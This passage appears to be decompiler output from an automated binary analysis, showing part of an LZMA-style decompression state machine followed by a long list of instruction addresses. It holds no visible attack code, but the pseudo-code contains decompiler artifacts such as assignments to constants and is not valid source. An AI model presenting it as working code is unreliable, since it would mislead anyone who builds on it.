                                                              							if(_v16 >= __ecx) {
                                                              								_v20 = _v20 - __ecx;
                                                              								_v16 = _v16 - __ecx;
                                                              								__cx = __ax;
                                                              								_v68 = 1;
                                                              								__cx = __ax >> 5;
                                                              								__eflags = __eax;
                                                              								__ebx = __ebx + __ebx + 1;
                                                              								 *__esi = __ax;
                                                              							} else {
                                                              								_v68 = _v68 & 0x00000000;
                                                              								_v20 = __ecx;
                                                              								0x800 = 0x800 - __edx;
                                                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                              								__ebx = __ebx + __ebx;
                                                              								 *__esi = __cx;
                                                              							}
                                                              							__eflags = _v20 - 0x1000000;
                                                              							_v72 = __ebx;
                                                              							if(_v20 >= 0x1000000) {
                                                              								goto L41;
                                                              							} else {
                                                              								goto L39;
                                                              							}
                                                              						case 0xe:
                                                              							L48:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								_v140 = 0xe;
                                                              								goto L173;
                                                              							}
                                                              							__ecx = _v116;
                                                              							__eax = _v16;
                                                              							_v20 = _v20 << 8;
                                                              							__ecx =  *_v116 & 0x000000ff;
                                                              							_v112 = _v112 - 1;
                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							_t161 =  &_v116;
                                                              							 *_t161 = _v116 + 1;
                                                              							__eflags =  *_t161;
                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							while(1) {
                                                              								L50:
                                                              								__eflags = __ebx - 0x100;
                                                              								if(__ebx >= 0x100) {
                                                              									break;
                                                              								}
                                                              								__eax = _v92;
                                                              								__edx = __ebx + __ebx;
                                                              								__ecx = _v20;
                                                              								__esi = __edx + __eax;
                                                              								__ecx = _v20 >> 0xb;
                                                              								__ax =  *__esi;
                                                              								_v88 = __esi;
                                                              								__edi = __ax & 0x0000ffff;
                                                              								__ecx = (_v20 >> 0xb) * __edi;
                                                              								__eflags = _v16 - __ecx;
                                                              								if(_v16 >= __ecx) {
                                                              									_v20 = _v20 - __ecx;
                                                              									_v16 = _v16 - __ecx;
                                                              									__cx = __ax;
                                                              									_t175 = __edx + 1; // 0x1
                                                              									__ebx = _t175;
                                                              									__cx = __ax >> 5;
                                                              									__eflags = __eax;
                                                              									 *__esi = __ax;
                                                              								} else {
                                                              									_v20 = __ecx;
                                                              									0x800 = 0x800 - __edi;
                                                              									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              									__ebx = __ebx + __ebx;
                                                              									 *__esi = __cx;
                                                              								}
                                                              								__eflags = _v20 - 0x1000000;
                                                              								_v72 = __ebx;
                                                              								if(_v20 >= 0x1000000) {
                                                              									continue;
                                                              								} else {
                                                              									goto L48;
                                                              								}
                                                              							}
                                                              							L56:
                                                              							_t178 =  &_v56;
                                                              							 *_t178 = _v56 & 0x00000000;
                                                              							__eflags =  *_t178;
                                                              							goto L57;
                                                              						case 0xf:
                                                              							L60:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								_v140 = 0xf;
                                                              								goto L173;
                                                              							}
                                                              							__ecx = _v116;
                                                              							__eax = _v16;
                                                              							_v20 = _v20 << 8;
                                                              							__ecx =  *_v116 & 0x000000ff;
                                                              							_v112 = _v112 - 1;
                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							_t208 =  &_v116;
                                                              							 *_t208 = _v116 + 1;
                                                              							__eflags =  *_t208;
                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							L62:
                                                              							__eflags = __ebx - 0x100;
                                                              							if(__ebx >= 0x100) {
                                                              								L57:
                                                              								__al = _v72;
                                                              								_v96 = _v72;
                                                              								goto L58;
                                                              							}
                                                              							L63:
                                                              							__eax = _v92;
                                                              							__edx = __ebx + __ebx;
                                                              							__ecx = _v20;
                                                              							__esi = __edx + __eax;
                                                              							__ecx = _v20 >> 0xb;
                                                              							__ax =  *__esi;
                                                              							_v88 = __esi;
                                                              							__edi = __ax & 0x0000ffff;
                                                              							__ecx = (_v20 >> 0xb) * __edi;
                                                              							__eflags = _v16 - __ecx;
                                                              							if(_v16 >= __ecx) {
                                                              								_v20 = _v20 - __ecx;
                                                              								_v16 = _v16 - __ecx;
                                                              								__cx = __ax;
                                                              								_t222 = __edx + 1; // 0x1
                                                              								__ebx = _t222;
                                                              								__cx = __ax >> 5;
                                                              								__eflags = __eax;
                                                              								 *__esi = __ax;
                                                              							} else {
                                                              								_v20 = __ecx;
                                                              								0x800 = 0x800 - __edi;
                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              								__ebx = __ebx + __ebx;
                                                              								 *__esi = __cx;
                                                              							}
                                                              							__eflags = _v20 - 0x1000000;
                                                              							_v72 = __ebx;
                                                              							if(_v20 >= 0x1000000) {
                                                              								goto L62;
                                                              							} else {
                                                              								goto L60;
                                                              							}
                                                              						case 0x10:
                                                              							L112:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								_v140 = 0x10;
                                                              								goto L173;
                                                              							}
                                                              							__ecx = _v116;
                                                              							__eax = _v16;
                                                              							_v20 = _v20 << 8;
                                                              							__ecx =  *_v116 & 0x000000ff;
                                                              							_v112 = _v112 - 1;
                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							_t371 =  &_v116;
                                                              							 *_t371 = _v116 + 1;
                                                              							__eflags =  *_t371;
                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							goto L114;
                                                              						case 0x11:
                                                              							L71:
                                                              							__esi = _v92;
                                                              							_v136 = 0x12;
                                                              							goto L135;
                                                              						case 0x12:
                                                              							__eflags = _v68;
                                                              							if(_v68 != 0) {
                                                              								__eax = _v92;
                                                              								_v136 = 0x13;
                                                              								__esi = _v92 + 2;
                                                              								L135:
                                                              								_v88 = _t626;
                                                              								goto L136;
                                                              							}
                                                              							__eax = _v80;
                                                              							_v52 = _v52 & 0x00000000;
                                                              							__ecx = _v92;
                                                              							__eax = _v80 << 4;
                                                              							__eflags = __eax;
                                                              							__eax = _v92 + __eax + 4;
                                                              							goto L133;
                                                              						case 0x13:
                                                              							__eflags = _v68;
                                                              							if(_v68 != 0) {
                                                              								_t475 =  &_v92;
                                                              								 *_t475 = _v92 + 0x204;
                                                              								__eflags =  *_t475;
                                                              								_v52 = 0x10;
                                                              								_v68 = 8;
                                                              								L147:
                                                              								_v128 = 0x14;
                                                              								goto L148;
                                                              							}
                                                              							__eax = _v80;
                                                              							__ecx = _v92;
                                                              							__eax = _v80 << 4;
                                                              							_v52 = 8;
                                                              							__eax = _v92 + (_v80 << 4) + 0x104;
                                                              							L133:
                                                              							_v92 = __eax;
                                                              							_v68 = 3;
                                                              							goto L147;
                                                              						case 0x14:
                                                              							_v52 = _v52 + __ebx;
                                                              							__eax = _v132;
                                                              							goto L143;
                                                              						case 0x15:
                                                              							__eax = 0;
                                                              							__eflags = _v60 - 7;
                                                              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                              							__al = __al & 0x000000fd;
                                                              							__eax = (__eflags >= 0) - 1 + 0xb;
                                                              							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                              							goto L123;
                                                              						case 0x16:
                                                              							__eax = _v52;
                                                              							__eflags = __eax - 4;
                                                              							if(__eax >= 4) {
                                                              								_push(3);
                                                              								_pop(__eax);
                                                              							}
                                                              							__ecx = _v8;
                                                              							_v68 = 6;
                                                              							__eax = __eax << 7;
                                                              							_v128 = 0x19;
                                                              							_v92 = __eax;
                                                              							goto L148;
                                                              						case 0x17:
                                                              							L148:
                                                              							__eax = _v68;
                                                              							_v84 = 1;
                                                              							_v76 = _v68;
                                                              							goto L152;
                                                              						case 0x18:
                                                              							L149:
                                                              							__eflags = _v112;
                                                              							if(_v112 == 0) {
                                                              								_v140 = 0x18;
                                                              								goto L173;
                                                              							}
                                                              							__ecx = _v116;
                                                              							__eax = _v16;
                                                              							_v20 = _v20 << 8;
                                                              							__ecx =  *_v116 & 0x000000ff;
                                                              							_v112 = _v112 - 1;
                                                              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							_t490 =  &_v116;
                                                              							 *_t490 = _v116 + 1;
                                                              							__eflags =  *_t490;
                                                              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                              							L151:
                                                              							_t493 =  &_v76;
                                                              							 *_t493 = _v76 - 1;
                                                              							__eflags =  *_t493;
                                                              							L152:
                                                              							__eflags = _v76;
                                                              							if(_v76 <= 0) {
                                                              								__ecx = _v68;
                                                              								__ebx = _v84;
                                                              								0 = 1;
                                                              								__eax = 1 << __cl;
                                                              								__ebx = _v84 - (1 << __cl);
                                                              								__eax = _v128;
                                                              								_v72 = __ebx;
                                                              								L143:
                                                              								_v140 = _t561;
                                                              								goto L3;
                                                              							}
                                                              							__eax = _v84;
                                                              							_v20 = _v20 >> 0xb;
                                                              							__edx = _v84 + _v84;
                                                              							__eax = _v92;
                                                              							__esi = __edx + __eax;
                                                              							_v88 = __esi;
                                                              							__ax =  *__esi;
                                                              							__edi = __ax & 0x0000ffff;
                                                              							__ecx = (_v20 >> 0xb) * __edi;
                                                              							__eflags = _v16 - __ecx;
                                                              							if(_v16 >= __ecx) {
                                                              								_v20 = _v20 - __ecx;
                                                              								_v16 = _v16 - __ecx;
                                                              								__cx = __ax;
                                                              								__cx = __ax >> 5;
                                                              								__eax = __eax - __ecx;
                                                              								__edx = __edx + 1;
                                                              								__eflags = __edx;
                                                              								 *__esi = __ax;
                                                              								_v84 = __edx;
                                                              							} else {
                                                              								_v20 = __ecx;
                                                              								0x800 = 0x800 - __edi;
                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                              								_v84 = _v84 << 1;
                                                              								 *__esi = __cx;
                                                              							}
                                                              							__eflags = _v20 - 0x1000000;
                                                              							if(_v20 >= 0x1000000) {
                                                              								goto L151;
                                                              							} else {
                                                              								goto L149;
                                                              							}
                                                              						case 0x19:
                                                              							__eflags = __ebx - 4;
                                                              							if(__ebx < 4) {
                                                              								_v48 = __ebx;
                                                              								L122:
                                                              								_t399 =  &_v48;
                                                              								 *_t399 = _v48 + 1;
                                                              								__eflags =  *_t399;
                                                              								L123:
                                                              								__eax = _v48;
                                                              								__eflags = __eax;
                                                              								if(__eax == 0) {
                                                              									_v52 = _v52 | 0xffffffff;
                                                              									goto L173;
                                                              								}
                                                              								__eflags = __eax - _v100;
                                                              								if(__eax > _v100) {
                                                              									goto L174;
                                                              								}
                                                              								_v52 = _v52 + 2;
                                                              								__eax = _v52;
                                                              								_t406 =  &_v100;
                                                              								 *_t406 = _v100 + _v52;
                                                              								__eflags =  *_t406;
                                                              								goto L126;
                                                              							}
                                                              							__ecx = __ebx;
                                                              							__eax = __ebx;
                                                              							__ecx = __ebx >> 1;
                                                              							__eax = __ebx & 0x00000001;
                                                              							__ecx = (__ebx >> 1) - 1;
                                                              							__al = __al | 0x00000002;
                                                              							__eax = (__ebx & 0x00000001) << __cl;
                                                              							__eflags = __ebx - 0xe;
                                                              							_v48 = __eax;
                                                              							if(__ebx >= 0xe) {
                                                              								__ebx = 0;
                                                              								_v76 = __ecx;
                                                              								L105:
                                                              								__eflags = _v76;
                                                              								if(_v76 <= 0) {
                                                              									__eax = __eax + __ebx;
                                                              									_v68 = 4;
                                                              									_v48 = __eax;
                                                              									__eax = _v8;
                                                              									__eax = _v8 + 0x644;
                                                              									__eflags = __eax;
                                                              									L111:
                                                              									__ebx = 0;
                                                              									_v92 = __eax;
                                                              									_v84 = 1;
                                                              									_v72 = 0;
                                                              									_v76 = 0;
                                                              									L115:
                                                              									__eax = _v68;
                                                              									__eflags = _v76 - _v68;
                                                              									if(_v76 >= _v68) {
                                                              										_t397 =  &_v48;
                                                              										 *_t397 = _v48 + __ebx;
                                                              										__eflags =  *_t397;
                                                              										goto L122;
                                                              									}
                                                              									__eax = _v84;
                                                              									_v20 = _v20 >> 0xb;
                                                              									__edi = _v84 + _v84;
                                                              									__eax = _v92;
                                                              									__esi = __edi + __eax;
                                                              									_v88 = __esi;
                                                              									__ax =  *__esi;
                                                              									__ecx = __ax & 0x0000ffff;
                                                              									__edx = (_v20 >> 0xb) * __ecx;
                                                              									__eflags = _v16 - __edx;
                                                              									if(_v16 >= __edx) {
                                                              										__ecx = 0;
                                                              										_v20 = _v20 - __edx;
                                                              										__ecx = 1;
                                                              										_v16 = _v16 - __edx;
                                                              										__ebx = 1;
                                                              										__ecx = _v76;
                                                              										__ebx = 1 << __cl;
                                                              										__ecx = 1 << __cl;
                                                              										__ebx = _v72;
                                                              										__ebx = _v72 | __ecx;
                                                              										__cx = __ax;
                                                              										__cx = __ax >> 5;
                                                              										__eax = __eax - __ecx;
                                                              										__edi = __edi + 1;
                                                              										__eflags = __edi;
                                                              										_v72 = __ebx;
                                                              										 *__esi = __ax;
                                                              										_v84 = __edi;
                                                              									} else {
                                                              										_v20 = __edx;
                                                              										0x800 = 0x800 - __ecx;
                                                              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                              										_v84 = _v84 << 1;
                                                              										 *__esi = __dx;
                                                              									}
                                                              									__eflags = _v20 - 0x1000000;
                                                              									if(_v20 >= 0x1000000) {
                                                              										L114:
                                                              										_t374 =  &_v76;
                                                              										 *_t374 = _v76 + 1;
                                                              										__eflags =  *_t374;
                                                              										goto L115;
                                                              									} else {
                                                              										goto L112;
                                                              									}
                                                              								}
                                                              								__ecx = _v16;
                                                              								__ebx = __ebx + __ebx;
                                                              								_v20 = _v20 >> 1;
                                                              								__eflags = _v16 - _v20;
                                                              								_v72 = __ebx;
                                                              								if(_v16 >= _v20) {
                                                              									__ecx = _v20;
                                                              									_v16 = _v16 - _v20;
                                                              									__ebx = __ebx | 0x00000001;
                                                              									__eflags = __ebx;
                                                              									_v72 = __ebx;
                                                              								}
                                                              								__eflags = _v20 - 0x1000000;
                                                              								if(_v20 >= 0x1000000) {
                                                              									L104:
                                                              									_t344 =  &_v76;
                                                              									 *_t344 = _v76 - 1;
                                                              									__eflags =  *_t344;
                                                              									goto L105;
                                                              								} else {
                                                              									goto L102;
                                                              								}
                                                              							}
                                                              							__edx = _v8;
                                                              							__eax = __eax - __ebx;
                                                              							_v68 = __ecx;
                                                              							__eax = _v8 + 0x55e + __eax * 2;
                                                              							goto L111;
                                                              						case 0x1a:
                                                              							L58:
                                                              							__eflags = _v104;
                                                              							if(_v104 == 0) {
                                                              								_v140 = 0x1a;
                                                              								goto L173;
                                                              							}
                                                              							__ecx = _v108;
                                                              							__al = _v96;
                                                              							__edx = _v12;
                                                              							_v100 = _v100 + 1;
                                                              							_v108 = _v108 + 1;
                                                              							_v104 = _v104 - 1;
                                                              							 *_v108 = __al;
                                                              							__ecx = _v24;
                                                              							 *(_v12 + __ecx) = __al;
                                                              							__eax = __ecx + 1;
                                                              							__edx = 0;
                                                              							_t197 = __eax % _v120;
                                                              							__eax = __eax / _v120;
                                                              							__edx = _t197;
                                                              							goto L82;
                                                              						case 0x1b:
                                                              							L78:
                                                              							__eflags = _v104;
                                                              							if(_v104 == 0) {
                                                              								_v140 = 0x1b;
                                                              								goto L173;
                                                              							}
                                                              							__eax = _v24;
                                                              							__eax = _v24 - _v48;
                                                              							__eflags = __eax - _v120;
                                                              							if(__eax >= _v120) {
                                                              								__eax = __eax + _v120;
                                                              								__eflags = __eax;
                                                              							}
                                                              							__edx = _v12;
                                                              							__cl =  *(__edx + __eax);
                                                              							__eax = _v24;
                                                              							_v96 = __cl;
                                                              							 *(__edx + __eax) = __cl;
                                                              							__eax = __eax + 1;
                                                              							__edx = 0;
                                                              							_t280 = __eax % _v120;
                                                              							__eax = __eax / _v120;
                                                              							__edx = _t280;
                                                              							__eax = _v108;
                                                              							_v100 = _v100 + 1;
                                                              							_v108 = _v108 + 1;
                                                              							_t289 =  &_v104;
                                                              							 *_t289 = _v104 - 1;
                                                              							__eflags =  *_t289;
                                                              							 *_v108 = __cl;
                                                              							L82:
                                                              							_v24 = __edx;
                                                              							goto L83;
                                                              						case 0x1c:
                                                              							while(1) {
                                                              								L126:
                                                              								__eflags = _v104;
                                                              								if(_v104 == 0) {
                                                              									break;
                                                              								}
                                                              								__eax = _v24;
                                                              								__eax = _v24 - _v48;
                                                              								__eflags = __eax - _v120;
                                                              								if(__eax >= _v120) {
                                                              									__eax = __eax + _v120;
                                                              									__eflags = __eax;
                                                              								}
                                                              								__edx = _v12;
                                                              								__cl =  *(__edx + __eax);
                                                              								__eax = _v24;
                                                              								_v96 = __cl;
                                                              								 *(__edx + __eax) = __cl;
                                                              								__eax = __eax + 1;
                                                              								__edx = 0;
                                                              								_t420 = __eax % _v120;
                                                              								__eax = __eax / _v120;
                                                              								__edx = _t420;
                                                              								__eax = _v108;
                                                              								_v108 = _v108 + 1;
                                                              								_v104 = _v104 - 1;
                                                              								_v52 = _v52 - 1;
                                                              								__eflags = _v52;
                                                              								 *_v108 = __cl;
                                                              								_v24 = _t420;
                                                              								if(_v52 > 0) {
                                                              									continue;
                                                              								} else {
                                                              									L83:
                                                              									_v140 = 2;
                                                              									goto L3;
                                                              								}
                                                              							}
                                                              							_v140 = 0x1c;
                                                              							L173:
                                                              							_push(0x22);
                                                              							_pop(_t574);
                                                              							memcpy(_v148,  &_v140, _t574 << 2);
                                                              							return 0;
                                                              					}
                                                              				}
                                                              				L174:
                                                              				_t538 = _t537 | 0xffffffff;
                                                              				return _t538;
                                                              			}










































                                                              0x00406bc0
                                                              0x00406bc7
                                                              0x00406bcd
                                                              0x00406bd3
                                                              0x00000000
                                                              0x00406bd7
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406be3
                                                              0x00406bec
                                                              0x00000000
                                                              0x00000000
                                                              0x00406bf2
                                                              0x00000000
                                                              0x00406bf9
                                                              0x00406bfd
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c06
                                                              0x00406c09
                                                              0x00406c0c
                                                              0x00406c0e
                                                              0x00406c10
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c16
                                                              0x00406c19
                                                              0x00406c1b
                                                              0x00406c1c
                                                              0x00406c1f
                                                              0x00406c21
                                                              0x00406c22
                                                              0x00406c24
                                                              0x00406c27
                                                              0x00406c2c
                                                              0x00406c31
                                                              0x00406c3a
                                                              0x00406c4d
                                                              0x00406c50
                                                              0x00406c59
                                                              0x00406c5c
                                                              0x00406c84
                                                              0x00406c84
                                                              0x00406c86
                                                              0x00406c94
                                                              0x00406c94
                                                              0x00406c98
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c88
                                                              0x00406c8b
                                                              0x00406c8b
                                                              0x00406c8c
                                                              0x00406c8c
                                                              0x00000000
                                                              0x00406c88
                                                              0x00406c5e
                                                              0x00406c62
                                                              0x00406c67
                                                              0x00406c67
                                                              0x00406c70
                                                              0x00406c76
                                                              0x00406c78
                                                              0x00406c7b
                                                              0x00000000
                                                              0x00406c81
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c81
                                                              0x00000000
                                                              0x00406c9e
                                                              0x00406c9e
                                                              0x00406ca2
                                                              0x0040754e
                                                              0x00000000
                                                              0x0040754e
                                                              0x00406cab
                                                              0x00406cbb
                                                              0x00406cbe
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc1
                                                              0x00406cc4
                                                              0x00406cc4
                                                              0x00406cc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406cca
                                                              0x00406ccd
                                                              0x00406cd0
                                                              0x00406cfa
                                                              0x00406d00
                                                              0x00406d07
                                                              0x00000000
                                                              0x00406d07
                                                              0x00406cd2
                                                              0x00406cd6
                                                              0x00406cd9
                                                              0x00406cde
                                                              0x00406cde
                                                              0x00406ce9
                                                              0x00406cef
                                                              0x00406cf1
                                                              0x00406cf4
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d39
                                                              0x00406d3f
                                                              0x00406d42
                                                              0x00406d4f
                                                              0x00406d57
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d0e
                                                              0x00406d0e
                                                              0x00406d12
                                                              0x0040755d
                                                              0x00000000
                                                              0x0040755d
                                                              0x00406d1e
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d29
                                                              0x00406d2c
                                                              0x00406d2f
                                                              0x00406d32
                                                              0x00406d35
                                                              0x00406d37
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004073ce
                                                              0x004073ce
                                                              0x004073d4
                                                              0x004073da
                                                              0x004073dd
                                                              0x004073e0
                                                              0x004073fa
                                                              0x004073fd
                                                              0x00407403
                                                              0x0040740e
                                                              0x0040740e
                                                              0x00407410
                                                              0x004073e2
                                                              0x004073e2
                                                              0x004073f1
                                                              0x004073f5
                                                              0x004073f5
                                                              0x00407413
                                                              0x0040741a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040741c
                                                              0x0040741c
                                                              0x00407420
                                                              0x004075cf
                                                              0x00000000
                                                              0x004075cf
                                                              0x0040742c
                                                              0x00407433
                                                              0x0040743b
                                                              0x0040743b
                                                              0x0040743b
                                                              0x0040743e
                                                              0x00407441
                                                              0x00407441
                                                              0x00000000
                                                              0x00000000
                                                              0x00406d5f
                                                              0x00406d61
                                                              0x00406d64
                                                              0x00406dd5
                                                              0x00406dd8
                                                              0x00406ddb
                                                              0x00406de2
                                                              0x00406dec
                                                              0x00000000
                                                              0x00406dec
                                                              0x00406d66
                                                              0x00406d6a
                                                              0x00406d6d
                                                              0x00406d6f
                                                              0x00406d72
                                                              0x00406d75
                                                              0x00406d77
                                                              0x00406d7a
                                                              0x00406d7c
                                                              0x00406d81
                                                              0x00406d84
                                                              0x00406d87
                                                              0x00406d8b
                                                              0x00406d92
                                                              0x00406d95
                                                              0x00406d9c
                                                              0x00406da0
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da8
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406da2
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406d97
                                                              0x00406dac
                                                              0x00406daf
                                                              0x00406dcd
                                                              0x00406dcf
                                                              0x00000000
                                                              0x00406dcf
                                                              0x00406db1
                                                              0x00406db4
                                                              0x00406db7
                                                              0x00406dba
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbc
                                                              0x00406dbf
                                                              0x00406dc2
                                                              0x00406dc4
                                                              0x00406dc5
                                                              0x00406dc8
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ffe
                                                              0x00407002
                                                              0x00407020
                                                              0x00407023
                                                              0x0040702a
                                                              0x0040702d
                                                              0x00407030
                                                              0x00407033
                                                              0x00407036
                                                              0x00407039
                                                              0x0040703b
                                                              0x00407042
                                                              0x00407043
                                                              0x00407045
                                                              0x00407048
                                                              0x0040704b
                                                              0x0040704e
                                                              0x0040704e
                                                              0x00407053
                                                              0x00000000
                                                              0x00407053
                                                              0x00407004
                                                              0x00407007
                                                              0x0040700a
                                                              0x00407014
                                                              0x00000000
                                                              0x00000000
                                                              0x00407068
                                                              0x0040706c
                                                              0x0040708f
                                                              0x00407092
                                                              0x00407095
                                                              0x0040709f
                                                              0x0040706e
                                                              0x0040706e
                                                              0x00407071
                                                              0x00407074
                                                              0x00407077
                                                              0x00407084
                                                              0x00407087
                                                              0x00407087
                                                              0x00000000
                                                              0x00000000
                                                              0x004070ab
                                                              0x004070af
                                                              0x00000000
                                                              0x00000000
                                                              0x004070b5
                                                              0x004070b9
                                                              0x00000000
                                                              0x00000000
                                                              0x004070bf
                                                              0x004070c1
                                                              0x004070c5
                                                              0x004070c5
                                                              0x004070c8
                                                              0x004070cc
                                                              0x00000000
                                                              0x00000000
                                                              0x0040711c
                                                              0x00407120
                                                              0x00407127
                                                              0x0040712a
                                                              0x0040712d
                                                              0x00407137
                                                              0x00000000
                                                              0x00407137
                                                              0x00407122
                                                              0x00000000
                                                              0x00000000
                                                              0x00407143
                                                              0x00407147
                                                              0x0040714e
                                                              0x00407151
                                                              0x00407154
                                                              0x00407149
                                                              0x00407149
                                                              0x00407149
                                                              0x00407157
                                                              0x0040715a
                                                              0x0040715d
                                                              0x0040715d
                                                              0x00407160
                                                              0x00407163
                                                              0x00407166
                                                              0x00407166
                                                              0x00407169
                                                              0x00407170
                                                              0x00407175
                                                              0x00000000
                                                              0x00000000
                                                              0x00407203
                                                              0x00407203
                                                              0x00407207
                                                              0x004075a5
                                                              0x00000000
                                                              0x004075a5
                                                              0x0040720d
                                                              0x00407210
                                                              0x00407213
                                                              0x00407217
                                                              0x0040721a
                                                              0x00407220
                                                              0x00407222
                                                              0x00407222
                                                              0x00407222
                                                              0x00407225
                                                              0x00407228
                                                              0x00000000
                                                              0x00000000
                                                              0x00406df8
                                                              0x00406df8
                                                              0x00406dfc
                                                              0x00407569
                                                              0x00000000
                                                              0x00407569
                                                              0x00406e02
                                                              0x00406e05
                                                              0x00406e08
                                                              0x00406e0c
                                                              0x00406e0f
                                                              0x00406e15
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e17
                                                              0x00406e1a
                                                              0x00406e1d
                                                              0x00406e1d
                                                              0x00406e20
                                                              0x00406e23
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e29
                                                              0x00406e2f
                                                              0x00000000
                                                              0x00000000
                                                              0x00406e35
                                                              0x00406e35
                                                              0x00406e39
                                                              0x00406e3c
                                                              0x00406e3f
                                                              0x00406e42
                                                              0x00406e45
                                                              0x00406e46
                                                              0x00406e49
                                                              0x00406e4b
                                                              0x00406e51
                                                              0x00406e54
                                                              0x00406e57
                                                              0x00406e5a
                                                              0x00406e5d
                                                              0x00406e60
                                                              0x00406e63
                                                              0x00406e7f
                                                              0x00406e82
                                                              0x00406e85
                                                              0x00406e88
                                                              0x00406e8f
                                                              0x00406e93
                                                              0x00406e95
                                                              0x00406e99
                                                              0x00406e65
                                                              0x00406e65
                                                              0x00406e69
                                                              0x00406e71
                                                              0x00406e76
                                                              0x00406e78
                                                              0x00406e7a
                                                              0x00406e7a
                                                              0x00406e9c
                                                              0x00406ea3
                                                              0x00406ea6
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eac
                                                              0x00000000
                                                              0x00406eb1
                                                              0x00406eb1
                                                              0x00406eb5
                                                              0x00407575
                                                              0x00000000
                                                              0x00407575
                                                              0x00406ebb
                                                              0x00406ebe
                                                              0x00406ec1
                                                              0x00406ec5
                                                              0x00406ec8
                                                              0x00406ece
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed0
                                                              0x00406ed3
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406ed6
                                                              0x00406edc
                                                              0x00000000
                                                              0x00000000
                                                              0x00406ede
                                                              0x00406ee1
                                                              0x00406ee4
                                                              0x00406ee7
                                                              0x00406eea
                                                              0x00406eed
                                                              0x00406ef0
                                                              0x00406ef3
                                                              0x00406ef6
                                                              0x00406ef9
                                                              0x00406efc
                                                              0x00406f14
                                                              0x00406f17
                                                              0x00406f1a
                                                              0x00406f1d
                                                              0x00406f1d
                                                              0x00406f20
                                                              0x00406f24
                                                              0x00406f26
                                                              0x00406efe
                                                              0x00406efe
                                                              0x00406f06
                                                              0x00406f0b
                                                              0x00406f0d
                                                              0x00406f0f
                                                              0x00406f0f
                                                              0x00406f29
                                                              0x00406f30
                                                              0x00406f33
                                                              0x00000000
                                                              0x00406f35
                                                              0x00000000
                                                              0x00406f35
                                                              0x00406f33
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00406f3a
                                                              0x00000000
                                                              0x00000000
                                                              0x00406f75
                                                              0x00406f75
                                                              0x00406f79
                                                              0x00407581
                                                              0x00000000
                                                              0x00407581
                                                              0x00406f7f
                                                              0x00406f82
                                                              0x00406f85
                                                              0x00406f89
                                                              0x00406f8c
                                                              0x00406f92
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f94
                                                              0x00406f97
                                                              0x00406f9a
                                                              0x00406f9a
                                                              0x00406fa0
                                                              0x00406f3e
                                                              0x00406f3e
                                                              0x00406f41
                                                              0x00000000
                                                              0x00406f41
                                                              0x00406fa2
                                                              0x00406fa2
                                                              0x00406fa5
                                                              0x00406fa8
                                                              0x00406fab
                                                              0x00406fae
                                                              0x00406fb1
                                                              0x00406fb4
                                                              0x00406fb7
                                                              0x00406fba
                                                              0x00406fbd
                                                              0x00406fc0
                                                              0x00406fd8
                                                              0x00406fdb
                                                              0x00406fde
                                                              0x00406fe1
                                                              0x00406fe1
                                                              0x00406fe4
                                                              0x00406fe8
                                                              0x00406fea
                                                              0x00406fc2
                                                              0x00406fc2
                                                              0x00406fca
                                                              0x00406fcf
                                                              0x00406fd1
                                                              0x00406fd3
                                                              0x00406fd3
                                                              0x00406fed
                                                              0x00406ff4
                                                              0x00406ff7
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00406ff9
                                                              0x00000000
                                                              0x00407286
                                                              0x00407286
                                                              0x0040728a
                                                              0x004075b1
                                                              0x00000000
                                                              0x004075b1
                                                              0x00407290
                                                              0x00407293
                                                              0x00407296
                                                              0x0040729a
                                                              0x0040729d
                                                              0x004072a3
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a5
                                                              0x004072a8
                                                              0x00000000
                                                              0x00000000
                                                              0x00407056
                                                              0x00407056
                                                              0x00407059
                                                              0x00000000
                                                              0x00000000
                                                              0x00407395
                                                              0x00407399
